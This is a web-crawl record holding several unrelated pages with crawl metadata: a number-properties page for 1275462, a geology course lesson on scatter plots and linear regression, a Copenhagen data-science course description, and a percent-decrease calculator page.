msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5e82e9e5-0fb2-4163-9562-61e601dc54c3>\",\"WARC-Concurrent-To\":\"<urn:uuid:db40673e-7d92-4bc8-af16-6adaeccd529d>\",\"WARC-IP-Address\":\"104.200.25.27\",\"WARC-Target-URI\":\"https://www.finance-assignments.com/solutions-2-4410\",\"WARC-Payload-Digest\":\"sha1:GTIDFJIVNSPGTEAHKM3DIZAQELMRVPHK\",\"WARC-Block-Digest\":\"sha1:NPOR44OFCUG3XMTTJVCQWADNG6HK7LNM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780055808.78_warc_CC-MAIN-20210917212307-20210918002307-00397.warc.gz\"}"}
https://metanumbers.com/1275462
[ "# 1275462 (number)\n\n1,275,462 (one million two hundred seventy-five thousand four hundred sixty-two) is an even seven-digits composite number following 1275461 and preceding 1275463. In scientific notation, it is written as 1.275462 × 106. The sum of its digits is 27. It has a total of 5 prime factors and 24 positive divisors. There are 417,600 positive integers (up to 1275462) that are relatively prime to 1275462.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 7\n• Sum of Digits 27\n• Digital Root 9\n\n## Name\n\nShort name 1 million 275 thousand 462 one million two hundred seventy-five thousand four hundred sixty-two\n\n## Notation\n\nScientific notation 1.275462 × 106 1.275462 × 106\n\n## Prime Factorization of 1275462\n\nPrime Factorization 2 × 32 × 59 × 1201\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 5 Total number of prime factors rad(n) 425154 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,275,462 is 2 × 32 × 59 × 1201. Since it has a total of 5 prime factors, 1,275,462 is a composite number.\n\n## Divisors of 1275462\n\n24 divisors\n\n Even divisors 12 12 6 6\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 24 Total number of the positive divisors of n σ(n) 2.81268e+06 Sum of all the positive divisors of n s(n) 1.53722e+06 Sum of the proper positive divisors of n A(n) 117195 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 1129.36 Returns the nth root of the product of n divisors H(n) 10.8832 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,275,462 can be divided by 24 positive divisors (out of which 12 are even, and 12 are odd). The sum of these divisors (counting 1,275,462) is 2,812,680, the average is 117,195.\n\n## Other Arithmetic Functions (n = 1275462)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 417600 Total number of positive integers not greater than n that are coprime to n λ(n) 34800 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 98053 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 417,600 positive integers (less than 1,275,462) that are coprime with 1,275,462. 
And there are approximately 98,053 prime numbers less than or equal to 1,275,462.\n\n## Divisibility of 1275462\n\n m n mod m 2 3 4 5 6 7 8 9 0 0 2 2 0 6 6 0\n\nThe number 1,275,462 is divisible by 2, 3, 6 and 9.\n\n• Arithmetic\n• Abundant\n\n• Polite\n\n## Base conversion (1275462)\n\nBase System Value\n2 Binary 100110111011001000110\n3 Ternary 2101210121100\n4 Quaternary 10313121012\n5 Quinary 311303322\n6 Senary 43200530\n8 Octal 4673106\n10 Decimal 1275462\n12 Duodecimal 516146\n20 Vigesimal 7j8d2\n36 Base36 rc5i\n\n## Basic calculations (n = 1275462)\n\n### Multiplication\n\nn×y\n n×2 2550924 3826386 5101848 6377310\n\n### Division\n\nn÷y\n n÷2 637731 425154 318866 255092\n\n### Exponentiation\n\nny\n n2 1626803313444 2074925807771911128 2646489020632377311141136 3375496179233813230022695604832\n\n### Nth Root\n\ny√n\n 2√n 1129.36 108.448 33.606 16.6392\n\n## 1275462 as geometric shapes\n\n### Circle\n\n Diameter 2.55092e+06 8.01396e+06 5.11075e+12\n\n### Sphere\n\n Volume 8.69143e+18 2.0443e+13 8.01396e+06\n\n### Square\n\nLength = n\n Perimeter 5.10185e+06 1.6268e+12 1.80378e+06\n\n### Cube\n\nLength = n\n Surface area 9.76082e+12 2.07493e+18 2.20916e+06\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 3.82639e+06 7.04426e+11 1.10458e+06\n\n### Triangular Pyramid\n\nLength = n\n Surface area 2.81771e+12 2.44532e+17 1.04141e+06\n\n## Cryptographic Hash Functions\n\nmd5 9cd39990ca5650265286cf512332dd74 b5938b6098d88483a9d1af5d6ffbc4034a7bc615 ea94a5c6ef0231cd0b8acf8b771b866621b0d1d9540160d1c697a10016c6e71f 7189c33ec2f4cba5573a11f2991953c2912be594d56808c15829db77f801652845b88573ac9bb755a6c9f7278fb7187ca9e02c5d75af5a3d91bc4e803578bc4a 829f2e8a3c0d1f717f79348efc74a8ce0a622191" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6201534,"math_prob":0.9858593,"size":4734,"snap":"2021-43-2021-49","text_gpt3_token_len":1699,"char_repetition_ratio":0.121564485,"word_repetition_ratio":0.039473683,"special_character_ratio":0.47317278,"punctuation_ratio":0.08652657,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99548584,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-22T19:04:21Z\",\"WARC-Record-ID\":\"<urn:uuid:fa9616dc-bd65-43f1-8b8a-bb5b38b43592>\",\"Content-Length\":\"39956\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:45cdacb0-87f0-49f5-9a42-ff7e1e45bd4c>\",\"WARC-Concurrent-To\":\"<urn:uuid:1496bba5-da7d-45c1-b57c-64e877d93fe7>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1275462\",\"WARC-Payload-Digest\":\"sha1:3R64XR35A6EHDSTXAODX2IMVJBPUQRT4\",\"WARC-Block-Digest\":\"sha1:T7O4XMUX3E42QDAJT54ANT7UZJGELBRV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585518.54_warc_CC-MAIN-20211022181017-20211022211017-00650.warc.gz\"}"}
http://maps.unomaha.edu/Maher/GEOL2300/week3/week3.html
[ "Week 3: Linear regression - bivariate analysis", null, "Week 3 index:\n\nScatter plot of lightning strike density in Pennsylvania versus elevation with a regression line, with an emphasis on the scatter. What can you tell from the plot? What does the R2 value indicate? A plot with the same axes might look quite different for the Rocky Mountains, a consideration come afternoon time when hiking high. Image source: Digital Mapping Techniques '03 — Workshop Proceedings U.S. Geological Survey Open-File Report 03–471 A Map of Lightning Strike Density for Southeastern Pennsylvania, and Correlation with Terrain Elevation By Alex J. DeCaria and Michael J. Babij - http://pubs.usgs.gov/of/2003/of03-471/decaria/index.html\n\nReading for this week: Chapt 3 in Sandilands, Statistics with Two Variables, p. 148 and on. This is available as a pdf document on Blackboard.\n\nOther sources of information:\n\n• Chapt 6 and 7 in Pagano, P. R., 1994, Understanding Statistics in the Behavioral Sciences (4th ed.), West Publishers, Minneapolis, 496 p. I have found this book very useful. The author isn't afraid to, or to hurried to, use words to provide a conceptual framework for the math, which is a nice switch from other textbooks. Read through this focusing on the concepts and diagrams.\n• Chapt 7 Curve Fitting in Lingme, B. V., 1997, A guide to Microsoft Excel for Scientists and Engineers, John Wiley and Sons., p. 74-83. This section goes through the mechanics of regressions in Excel. You can read this if what is found in the description below is not enough.\n• Hall-Wallace, M. K., 2000, Using Linear Regression to Determine Plate Motions; Journal of Geoscience Education, v. 48, p. 455\n\nScatter plots\n\nLast week we looked at how to describe and analyze one variable. How about two variables that might be related in some way (known as bivariate analysis)? The first step to investigating what the relationship might be between two paired variables is to create a scatter plot, a simple plot of x versus y for the paired variables. What makes an x and y value paired? They could be data collected at the same time and place, or they could be taken from the same specimen, or they could be the previous versus subsequent values in one population. Something unites them, and then questions arise. Is one dependent on the other? Is there some type of mathematical relationship that can be established between the two? What is the strength of that relationship? Initially, one can assess the scatter plot qualitatively, and that helps with subsequent more quantitative analysis. Is there a well defined relationship where the plotted points seem to fall along a line or a curve, or is there a poorly defined or absent relationship that looks like a shotgun blast? Are there clusters? If there is a good linear pattern, is there a negative or positive slope? Is there a fractal pattern (more on that later)? There are good examples of different types of scatter plot patterns in your reading.", null, "Above is an example of a simple scatter plot for measurements taken in the San Fransisco Bay from two cruises on August 20 (red) versus February 23rd (blue) in 2010 and from 1-3 m water depth. What can you conclude from this simple scatter plot? A good starting place is to consider what determines the dissolved oxygen content of surface waters. 
This graph was constructed at the USGS site: http://sfbay.wr.usgs.gov/cgi-bin/sfbay/dispsys/plotdata4.pl (an interesting array of scatter plots can be constructed giving insight into water quality in the Bay).", null, "Scatter plot of dissolved oxygen versus temperature for the Beaufort River in South Carolina. Why is the relationship between the two so much tighter here than in the plot above? Image source USGS site: http://sofia.usgs.gov/projects/workplans06/hydro_mon.html\n\nThere is a next step in sophistication of analysis where one looks at the relationships between many variables at once (multivariate analysis). Such analysis is beyond the scope of this particular course, but if often learned in a statistics course.\n\nLinear regression and correlation\n\nWhy would you want to regress? Regression, as often practiced in earth sciences, is the attempt to establish a mathematical relationship between two variables. Such a relationsip can be used to extrapolate beyond the range of data/observation, or interpolate between data points, basically to predict one variable given the other. For example, a relationship exists between the frequency of occurrence of a given size flood or earthquake, and the size of the event. Given flood data, and assuming constancy of system operation then one can predict how big a size of a certain frequency will be, i.e. how big the 100 year flood will be. A linear relationship between two variables is captured by the formula y = b + m x , where b is the y intercept and m is the slope. It is significant which variable is y and which is x, as is explained below. The default convention is that x represents the independent variable, and y represents the dependent variable, and that predictions of y are made for a given x value. We won't explicitly deal with curvi-linear regression, although the general approach is similar. It is not uncommon that a non-linear relationship can be transformed into a linear one by a mathematical transformation (very commonly a log transformation).\n\nCorrelation measures the dependability of the relationship (the goodness of fit of the data to the mathematical relationship). It is a measure of how well one variable can predict the other (given the context of the data), and determines the precision you can assign to a relationship.\n\nRegression or correlation can be bivariate (between 2 variables, x and y) or multivariate, between greater than two variables. Regression is interested in the form of the relationship, whereas correlation is more focused simply on the strength of a relationship. In this class we will only deal with classical bivariate linear regression, because it is commonly used and the simplest situation. Just to stress the point through repetition, in all cases the independent variable(s) vs. the dependent variable(s) needs to be clearly defined.", null, "This example shows how linear regression is used to calibrate an instrument.. In this particular case you have the travel time obtained with a Grand Penetrating Radar traverse across river channels as a function of the water depth as measured using weights. In this particular case. given travel time you would like to be able to predict water depth, and this determines which one is x and which one is y. Thus this best-fit line is the calibration line - what is used to turn a traveltime into a water depth. What is the relationship between the amount of scatter and the error you would assign a depth determined by GPR? r2 describes this, and is described more below. 
Note that the intercept of the line is not zero. Should it be? Image from USGS site: http://sfbay.wr.usgs.gov/cgi-bin/sfbay/dispsys/plotdata4.pl .\n\nIndependent vs. dependent variables and best-fit lines.\n\nA key sin in statistics is to confuse these two, and much shaking of heads and wagging of tongues is directed toward those committing this particular sin. We will see that in many situations it is clear, which is which, but in some cases it is not. The important thing to realize is that which of your two variables you cast into either role does make a difference in the results. The convention (that is built into statistical software packages) is that x is your independent variable and y the dependent variable. But what is the difference?\n\nIn a controlled laboratory situation, the independent variable is the one the experimenter controls, and the dependent is the variable of interest that is measured for different values of the independent variable. If you are looking at the solubility as a function of temperature, temperature would be the independent variable and mass per unit volume of the material dissolved (the solubility) would be the dependent variable. Often there is a stated or unstated assumption that the dependent variable is controlled by the independent one; i.e. that there is a causal (not casual) relation between the two. So temperature changes causes solubility to change. A change in solubility is not thought to cause a change in temperature. Note that you could theoretically use solubility to measure temperature, and so the role of independent vs. dependent could be switched, but what an inefficient way to measure temperature! What is the dependent vs. what is the independent variable is sensitive to the context.\n\nThose used to working in the luxury of a controlled laboratory situation may be forgiven for thinking that there is always a clear cut distinction between dependent vs. independent variables. The real world is more complex. For example, one can investigate whether there is a statistical relationship between Si and K content in a suite of volcanic rocks. Which one is the dependent and which one is the independent variable? Typically Si is taken as the x coordinate, but why? Or perhaps one is looking at the relationship between two different contaminants in an aquifer. This is not a controlled situation. Again, context is the guide. Very often it is helpful to assign the variable you want to predict, or know less about as the dependent variable. For example, if one contaminant was a derivative of the other and an inverse relationship could be expected in any water sample, then the derivative compound would be the dependent variable. If one contaminant was much easier to measure and on the basis of a relationship between the two, was to be used as a proxy indicator or indicator of another then the proxy would be the independent variable. The most important think is to have thought this out before proceeding with the analysis or presenting your results. Establishing a mathematical relationship does not mean you have established a causal relationship.\n\nThe results of a linear regression are often termed the best-fit line. What does this mean? If you imagine a regression line (the plot of a linear equation) and the scatter plot of points that produced it, then imagine the vertical lines (y distance) between each point and the regression line, you have one image of goodness of fit. The smaller those distances the better the fit. 
Combine those into an aggregate length. This length is a measure of how vertically close the y values are to the regression line. In a perfect fit, there would no difference, with the points plotting right on the line, and the aggregate length would be 0. Different regression lines for the same data produce different aggregate lengths. The statistical routine in Excel and other statistical packages computes the line of minimum deviation, of minimum aggregate length, the one that the points are, in aggregate, closest to.\n\nWhich variable is assigned to x and which to y does make a difference. As an experiment you can put in some real data and run the linear regression both ways (interchange x and y as independent and dependent variables). Why the difference? Simply because in one case you are minimizing the variation for y (the conventional case), and in the other you are minimizing the variation for x.", null, "In a regression of y as the dependent variable, given x, the aggregate values for all the data points of distance A is minimized in the best fit routine. If you reverse the roles of x and y then distance B is minimized instead, and hence you can get a different answer. It is possible to minimize C also.\n\nNatural system feedback loops provide an interesting difficulty because there is not a one way causal relationship. Instead, both variables are interdependent. Snowcover and local air temperature could be one example. Of course, the air temperature determines how much snow melts or doesn't, but also the albedo of the snow affects local air temperature. Try to think of others. What to do in this situation? There is a type of linear regression that instead of seeking to minimize error of line fit only in the y variable, minimizes the error in both x and y. This is described in your Swan and Sandilands reference, and is referred to as structural regression. As you might guess it is more difficult, and we won't treat it here. However, you should look into it when the occasion arises. In any case, in your work you should clearly state which is your independent and which is your dependent variable (has this been stressed enough?). The reader can agree or disagree with your call and take it from there.\n\nIn class exercise: initial exploration of a bivariate relationship.\n\nThis will be a group project. Get into groups of 3.\n\n• Think of some potential relationship between two earth science variables that could be interesting to explore. It could be, for example, between average annual rainfall and sedimentation rate in a lake.\n• For that relationship address the following questions:\n• Why would you expect a relationship, i.e. what is your causal model?\n• Which one should be the independent and which one should be the dependent variable?\n• Where or how might you obtain the needed data?\n• What type of relationship might you expect? In other words, what might be the shape of the scatter plot of the two.\n\nThe more specific you get the better. Report to the class.\n\nThe correlation coefficient.\n\nThe regression equation can be thought of as a mathematical model for a relationship between the two variables. The natural question is how good is the model, how good is the fit. That is where r comes in, the correlation coefficient (technically Pearson's correlation coefficient for linear regression). This basically quantifies how well pairs of x and y positions within their own distributions match each other. 
If there is a perfect fit, and x explains all the variation in y, then the one distribution as described by the mean and standard deviation of the population of x numbers should suffice for y. In other words if an x value is .65 standard deviation units from the mean, then its y pair should also be .65 standard deviation units from the mean if there is a perfect fit. The basic measure is how much of the variation in y can be explained by the variation in x.\n\nTrying to understand r: One could use the aggregate distance of deviation from the best fit line as described above as a crude measure of goodness of fit. However, the outcome would be a function of the specific scale and units in each individual case, and it would be hard to know how to interpret the resulting number. What is done instead is that each x and y value is scaled against their own distribution, i.e. they are standardized against the distribution of each variable. This is done by computing z score values for each value for both x and y, where z is obtained by subtracting the mean from each value and dividing by the distribution's standard deviation. Basically z values measure the distance from the mean in units of standard deviations. In a perfect fit a y value's position in its distribution will be in the same position as its corresponding x value' position in its distribution - a one to one correspondence. If one plots the z scores for x and y pairs against each other this one to one fit yields a slope of 1. In a good fit the pairs will be close, but not perfect. For low z values of x, where the value is close to or at the mean, the corresponding normalized z value of y likely will be greater because of the deviation in y that is not explained by x. In turn, at the highest z value of x, where x is at its extreme range in the distribution, the z value of the corresponding y is likely to be closer to the y mean, and hence will tend to plot below a one to one position. The result is that the line then has a slope less than one. If there is no relationship then as the z value for x increases, the z value for corresponding y can be higher or lower, resulting in slope of 0. If the position of one variable in its own distribution bears no relationship to that of its companion variable, then a slope of 0 results. r is the slope of the z score values of the two variables plotted against each other. A value of 1 means a perfect fit, and a value of 0 means no relationship exists between the two variables.\n\nWhat it boils down to: r is a measure of goodness of fit. Values close to 1 indicate a very good fit. If you square r it represents the proportion of variability of y accounted for by x. In other words, if you had an r-squared value of .95 you can account for 95% of the variability in y with knowledge of x. In geology r-squared values greater than .9 are preferred, but note that even if you have an r-squared of .33, this means that x is still describing a significant proportion of the y behavior. Those below .5 are considered pretty useless for bivariate analysis, because the associated error is so big. Multivariate analysis is different. Again, if using the mathematical relationship to predict y given x, then the convention is to report an error = 2 x SSE, but this convention is not always followed.\n\nSSE = Standard error of estimate: If you use x to predict y given the relationship you might want to know what are the chances the realy y value is a certain amount away. 
One commonly sees error reported in association with U-Pb radiometric dates. In part this is where these errors come from, the fitting of a line to isotopic ratio data (known as a chord). There are some implicit assumptions you will need to investigate if the error becomes important to you (i.e. you need to learn a bit more than is presented here). The plus or minus a certain number of million years error reported is usually reported at two SEEs, which means that 95% of the values obtained if this sample were dated over and over again would lie within the noted error range. This is the conventional error reported. For example, an age of 346+/-2 Ma years can then be read that one can be 95% confident that the age is between 344 and 348.\n\nCorrelation vs. cause. We have mentioned this before, but it bears repeating. Imagine a situation where one variable controls or influences two other variables that are independent of each other. For example, temperature controlling algal reproduction and the amount of calcium dissolved in the water of a pond (although the amount of calcium could influence algal reproduction also, and thus they wouldn't be truly independent). A regression of algal concentration versus dissolved sodium could develop a statistically significant relationship, and even a useful, one. However, it would be wrong to conclude that dissolved sodium content was necessarily controlling the biota. This is when you get into multivariate analysis, taking into account the multiple factors that are likely to be related.\n\nProblems with closed correlations occur when working with percent data. This is especially a problem with geochemical or point count data, which are very common in geology. Since the sum of the components must equal one, when plotting one versus the other there must be an inverse relationship, because as one increases in percentage, the other must decrease. This is most easily seen in thinking of a two component system, where there must be a perfect fit with an r = -1. Three or more components will still provide correlations that have nothing to do with true association, or causation. The problem is less severe with trace elements, but can still exist. There are alternate possible relationships in looking for real correlations, but we don't have time to go into those here. Swan and Sandilands do discuss some of the alternate possibilities.\n\nRegression in Excel.\n\nAs usual there are several ways to do a regression, depending on part how much information you want.\n\n• Simple regression in Excel quick and dirty:\n• Insert your data with labels, into your spreadsheet with x and y in two separate columns.\n• Create a scatter plot, making sure you use identify the x and y variables appropriately (see above).\n• For older versions of Excel, with the chart selected, select TRENDLINE under the CHART heading. In the Options page make sure you choose to have Excel return the equation in addition to the r-squared value.\n• For Excel 2007 you use the upper Insert tab and choose the insert scatter plot icon from the array of chart possibilities. Once the chart is created, then you can migrate to the upper Layout tab and then from the Analysis section of choices you can select the Trendline option and follow the instructions. You will need to have the chart selected in order to access these options. Note that if you want the r-squared value to be returned you need to check that option when creating your trendline. 
The two tabs that allow you to work with your plots/charts are the Layout and Design tabs, and are worth exploring further.\n• U-Tube video on constructing scatter plots and trendline.\n• For piecemeal information the following functions can be used:\n• LINEST (returns the slope and intercept values).\n• SLOPE.\n• INTERCEPT.\n• STEYX (returns the Standard Error for y on x).\n• CORREL (returns bivariate correlation coefficient).\n• For complete statistics and detailed analysis use the REGRESSION under Tools and Data Analysis (the same place you found the histogram making option).\n\nExamples of linear regression.\n\nA similar approach can be taken to estimate recurrence intervals of earthquakes. You will explore this in your exercise.", null, "" ]
[ null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/strikevselevation.jpg", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/O2vsTSanFranBay.gif", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/beaufort.gif", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/calibrationradar.gif", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/xvsy.jpg", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/scatterth.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94193476,"math_prob":0.9544897,"size":18707,"snap":"2019-13-2019-22","text_gpt3_token_len":3798,"char_repetition_ratio":0.1466075,"word_repetition_ratio":0.005669291,"special_character_ratio":0.19976479,"punctuation_ratio":0.0983835,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99376446,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,1,null,1,null,1,null,2,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-21T09:40:13Z\",\"WARC-Record-ID\":\"<urn:uuid:2872b850-78d4-4cbf-992f-fff76734d342>\",\"Content-Length\":\"29348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:32354ad4-ddbe-4266-b24f-f8810e718104>\",\"WARC-Concurrent-To\":\"<urn:uuid:b9f606f7-80a7-4167-a113-f5f90bf08125>\",\"WARC-IP-Address\":\"137.48.16.54\",\"WARC-Target-URI\":\"http://maps.unomaha.edu/Maher/GEOL2300/week3/week3.html\",\"WARC-Payload-Digest\":\"sha1:PYUL57UBCJEESRHRZ3TCNL4B66H5JXEH\",\"WARC-Block-Digest\":\"sha1:2FGE273I56QMD47HGGOXSGK4ZJZA74PF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202510.47_warc_CC-MAIN-20190321092320-20190321114320-00229.warc.gz\"}"}
https://kurser.ku.dk/course/ndak16003u/2018-2019
[ "# NDAK16003U Introduction to Data Science (IDS)\n\nVolume 2018/2019\nEducation\n\nMSc Programme in IT and Cognition\nMSc Programme in Bioinformatics\nMSc Programme in Molecular Biomedicine\n\nContent\n\nThe amount and complexity of available data is steadily increasing. To make use of this wealth of information, computing systems are needed that turn data into knowledge. Machine learning is about developing the required software that automatically analyses data for making predictions, categorizations, and recommendations. Machine learning algorithms are already an integral part of today's computing systems - for example in search engines, recommender systems, or biometrical applications. Machine learning provides a set of tools that is widely applicable for data analysis within a diverse set of problem domains such as data mining, search engines, digital image and signal analysis, natural language modeling, bioinformatics, physics, economics, biology, etc.\n\nThe purpose of the course is to introduce non-Computer Science students to probabilistic data modeling and the most common techniques from statistical machine learning and data mining. The students will obtain a working knowledge of basic data modeling and data analysis using fundamantal machine learning techniques.\n\nThis course is relevant for students from, among others, the studies of Cognition and IT, Bioinformatics, Physics, Biology, Chemistry, Economics, and Psychology.\n\nThe course covers the following tentative topic list:\n\n• Foundations of statistical learning, probability theory.\n• Classification methods, such as: Linear models, K-Nearest Neighbor.\n• Regression methods, such as: Linear regression.\n• Clustering.\n• Dimensionality reduction and visualization techniques such as principal component analysis (PCA).\nLearning Outcome\n\nAt course completion, the successful student will have:\n\nKnowledge of\n\n• the general principles of data analysis;\n• elementary probability theory for modeling and analyzing data;\n• the basic concepts underlying classification, regression, and clustering;\n• common pitfalls in machine learning.\n\nSkills in\n\n• applying linear and non-linear techniques for classification and regression;\n• elementary data clustering;\n• visualizing and evaluating results obtained with machine learning techniques;\n• identifying and handling common pitfalls in machine learning;\n• using machine learning and data mining toolboxes.\n\nCompetences in\n\n• recognizing and describing possible applications of machine learning and data analysis in their field of science;\n• comparing, appraising and selecting machine learning methods for specific tasks;\n• solving real-world data mining and pattern recognition problems by using machine learning techniques.\n\nSee Absalon when the course is set up.\n\nVery basic calculus and programming knowledge is required.\nLecture and exercise classes\nThe courses NDAK16003U Introduction to Data Science (IDS) and NDAB15001U Modelling and Analysis of Data (MAD) have a very substantial overlap both in topics and level, and it is therefore not recommended that students pass both these courses.\n• Category\n• Hours\n• Lectures\n• 28\n• Practical exercises\n• 74\n• Preparation\n• 30\n• Theory exercises\n• 74\n• Total\n• 206\nCredit\n7,5 ECTS\nType of assessment\nContinuous assessment\nAssessment of 6-8 assignments weighted equally. Passed assignments cannot be transferred to another block.\nAid\nAll aids allowed\nMarking scale" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8213435,"math_prob":0.54859644,"size":3951,"snap":"2019-51-2020-05","text_gpt3_token_len":843,"char_repetition_ratio":0.11933114,"word_repetition_ratio":0.0034662045,"special_character_ratio":0.20197418,"punctuation_ratio":0.11980033,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96508986,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-29T16:03:08Z\",\"WARC-Record-ID\":\"<urn:uuid:334bdc82-3402-4bfb-9dc4-e14a10c628bb>\",\"Content-Length\":\"37771\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f45edcf8-7197-4516-a74b-5af3cac98776>\",\"WARC-Concurrent-To\":\"<urn:uuid:73336808-1c64-485c-9ddd-1b5a61c7e1cd>\",\"WARC-IP-Address\":\"130.225.88.227\",\"WARC-Target-URI\":\"https://kurser.ku.dk/course/ndak16003u/2018-2019\",\"WARC-Payload-Digest\":\"sha1:F3IFKGBDQRBUL27PIGRTKY7ZFTGVZI5R\",\"WARC-Block-Digest\":\"sha1:JSM5SXTO3VLVKPCXBBT4653E6M4FNQHI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251799918.97_warc_CC-MAIN-20200129133601-20200129163601-00368.warc.gz\"}"}
https://whatpercentcalculator.com/what-is-percent-decrease-from-105-to-95
[ "# What is the percent decrease from 105 to 95?\n\n## (Percent decrease from 105 to 95 is 9.52381 percent)\n\n### Percent decrease from 105 to 95 is 9.52381 percent! Explanation: What does 9.52381 percent or 9.52381% mean?\n\nPercent (%) is an abbreviation for the Latin “per centum”, which means per hundred or for every hundred. So, 9.52381% means 9.52381 out of every 100. For example, if you decrease 105 by 9.52381% then it will become 95.\n\n### Methods to calculate \"What is the percent decrease from 105 to 95\" with step by step explanation:\n\n#### Method: Use the Percent Decrease Calculator formula (Old Number - New Number/Old Number)*100 to calculate \"What is the percent decrease from 105 to 95\".\n\n1. From the New Number deduct Old Number i.e. 105-95 = 10\n2. Divide above number by Old Number i.e. 10/105 = 0.0952381\n3. Multiply the result by 100 i.e. 0.0952381*100 = 9.52381%\n\n### 105 Percentage example\n\nPercentages express a proportionate part of a total. When a total is not given then it is assumed to be 100. E.g. 105% (read as 105 percent) can also be expressed as 105/100 or 105:100.\n\nExample: If you earn 105% (105 percent) profit then on an investment of \\$100 you receive a profit of \\$105.\n\nAt times you need to calculate a tip in a restaurant, or how to split money between friends in your head, that is without any calculator or pen and paper.\nMany a time, it is quite easy if you break it down to smaller chunks. You should know how to find 1%, 10% and 50%. After that finding percentages becomes pretty easy.\n• To find 5%, find 10% and divide it by two\n• To find 11%, find 10%, then find 1%, then add both values\n• To find 15%, find 10%, then add 5%\n• To find 20%, find 10% and double it\n• To find 25%, find 50% and then halve it\n• To find 26%, find 25% as above, then find 1%, and then add these two values\n• To find 60%, find 50% and add 10%\n• To find 75%, find 50% and add 25%\n• To find 95%, find 5% and then deduct it from the number\nIf you know how to find these easy percentages, you can add, deduct and calculate percentages easily, specially if they are whole numbers. At least you should be able to find an approximate.\n\n### Scholarship programs to learn math\n\nHere are some of the top scholarships available to students who wish to learn math.\n\n### Examples to calculate \"What is the percent decrease from X to Y?\"\n\nWhatPercentCalculator.com is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9287319,"math_prob":0.9733707,"size":4794,"snap":"2021-31-2021-39","text_gpt3_token_len":1384,"char_repetition_ratio":0.31398746,"word_repetition_ratio":0.23541453,"special_character_ratio":0.36691698,"punctuation_ratio":0.067540325,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99392855,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T09:59:42Z\",\"WARC-Record-ID\":\"<urn:uuid:8e395ccf-2b4f-41d7-9bf0-619680944fb0>\",\"Content-Length\":\"17368\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2f990ccc-564d-4fd4-a5f9-00cfd22c0d01>\",\"WARC-Concurrent-To\":\"<urn:uuid:7d44f17b-2e38-4626-8b1e-67d291137342>\",\"WARC-IP-Address\":\"104.21.81.186\",\"WARC-Target-URI\":\"https://whatpercentcalculator.com/what-is-percent-decrease-from-105-to-95\",\"WARC-Payload-Digest\":\"sha1:MYZ2WAY65KSYOER3VJOYFLEC2R57XDPO\",\"WARC-Block-Digest\":\"sha1:RGOOM25B4QLUSSMH7ZK4NFL7GFNLC2VL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153709.26_warc_CC-MAIN-20210728092200-20210728122200-00632.warc.gz\"}"}
http://khamphukhoa.org/underrated-concerns-about-what-is-a-coefficient-in-math-you-should-read-about/
